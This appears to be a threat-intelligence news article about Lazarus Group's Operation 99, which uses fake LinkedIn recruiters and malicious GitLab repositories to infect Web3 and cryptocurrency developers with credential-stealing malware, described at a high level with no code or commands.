The Lazarus Group, a notorious North Korean cybercrime syndicate, has launched a new cyberattack campaign named Operation 99, aimed at software developers in the Web3 and cryptocurrency sectors. The attackers use fake LinkedIn profiles to lure developers with promises of freelance opportunities, delivering malware in the process.
Fake LinkedIn Profiles as Bait
According to Ryan Sherstobitoff, Senior Vice President of Threat Research and Intelligence at SecurityScorecard, "The campaign begins with fake recruiters on platforms like LinkedIn, enticing developers with project tests and code reviews." Once a developer shows interest, they are directed to clone a malicious GitLab repository, which, although appearing harmless, is laden with malware. This cloned code connects to a command-and-control (C2) server, embedding malware into the victim's system.
Global Impact of Operation 99
Victims of Operation 99 have been identified globally, with a significant concentration in Italy. Other impacted regions include Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S. While precise victim data remains undisclosed, the attackers have successfully convinced developers to run the malicious code.
The name "Operation 99" is derived from version identifiers labeled pay99, used in the malware’s artifacts. The campaign builds on similar tactics observed in previous Lazarus operations, such as Operation Dream Job (NukeSped), but with a targeted focus on Web3 and cryptocurrency developers.
Advanced Tactics and AI-Driven Deception
Lazarus Group continues to evolve its methods, using advanced techniques like AI-generated profiles and realistic communication strategies. Sherstobitoff stated, "These increasingly sophisticated and authentic lures deceive even the most vigilant individuals, exploiting human trust and curiosity." These tactics make it easier for the attackers to create convincing scenarios, leading developers into their trap.
Deceptive LinkedIn Profiles and Malicious Repositories
In Operation 99, attackers target developers with coding project opportunities as part of an elaborate recruitment scheme. Fake LinkedIn profiles are crafted to entice developers, who are then directed to compromised GitLab repositories. The goal is to deploy malware designed to steal sensitive data, such as source code, secret keys, and cryptocurrency wallet credentials.
Key Malware Payloads in Operation 99
The malware used in this campaign includes Main5346 and its variant Main99, which act as downloaders for three additional payloads:
- Payload99/73 (and its variant Payload5346): Collects system data, terminates web browser processes, executes arbitrary commands, and maintains a persistent connection to the C2 server.
- Brow99/73: Targets web browsers to facilitate credential theft.
- MCLIP: Monitors and exfiltrates keyboard and clipboard data in real time.
By compromising developer environments, attackers exfiltrate intellectual property and gain access to cryptocurrency wallets, potentially leading to direct financial theft. The theft of private and secret keys could result in millions of dollars in stolen digital assets, further fueling Lazarus Group’s financial goals.
A Modular, Cross-Platform Malware Architecture
The malware deployed in Operation 99 is designed with modularity and flexibility, capable of targeting Windows, macOS, and Linux operating systems. This adaptability highlights the evolving and sophisticated nature of nation-state cyber threats.
Sherstobitoff emphasized, "For North Korea, hacking is a critical revenue-generating lifeline. Lazarus Group has funneled stolen cryptocurrency to support the regime's ambitions, amassing enormous sums. As the Web3 and cryptocurrency industries continue to grow, Operation 99 focuses on these high-value sectors."
Conclusion: The Growing Threat of Nation-State Cybercrime
Operation 99 underscores the ongoing threat posed by advanced nation-state actors like Lazarus Group. As the Web3 and cryptocurrency industries flourish, developers must remain vigilant against increasingly sophisticated phishing and malware attacks. With targeted campaigns like Operation 99, Lazarus Group is positioning itself to continue exploiting this rapidly expanding sector for financial gain.
Stay informed and protect your development environment to avoid falling victim to these evolving cyber threats.